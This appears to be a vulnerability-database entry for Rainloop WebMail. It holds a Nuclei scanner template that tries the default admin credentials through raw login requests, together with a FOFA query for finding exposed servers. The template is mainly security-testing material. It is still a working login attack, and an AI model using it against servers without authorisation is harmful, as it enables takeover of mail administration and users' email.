rainloop-default-login: Rainloop WebMail - Default Admin Login

Date: 2025-08-01 | Affected software: Rainloop WebMail | PoC: public

Vulnerability description

The Rainloop WebMail admin login accepts the default admin credentials.

FOFA query: app="RAINLOOP-WebMail"

PoC code [public]

id: rainloop-default-login

info:
  name: Rainloop WebMail - Default Admin Login
  author: For3stCo1d
  severity: high
  description: Rainloop WebMail default admin login credentials were successful.
  reference:
    - https://github.com/RainLoop/rainloop-webmail/issues/28
  classification:
    cpe: cpe:2.3:a:rainloop:webmail:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: rainloop
    product: webmail
    fofa-query: app="RAINLOOP-WebMail"
  tags: default-login,rainloop,webmail,foss,vuln

http:
  - raw:
      - |
        GET /?/AdminAppData@no-mobile-0/0/15503332983847185/ HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /?/Ajax/&q[]=/0/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        Login={{user}}&Password={{pass}}&Action=AdminLogin&XToken={{token}}

    attack: pitchfork
    payloads:
      user:
        - admin
      pass:
        - 12345

    extractors:
      - type: regex
        name: token
        internal: true
        group: 1
        regex:
          - 'token":"(.+?)"'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"Action":"AdminLogin"'
          - '"Result":true'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100ee6e9e529fa922696a23ff6932b2f3e211b7c8cbc982ad31b68da061b7523cb50220457d37a4df2b9f3aa7f8e2fa11dcc32598dc48b7e3856bee4695fca2ad20fb07:922c64590222798bb761d5b6d8e72950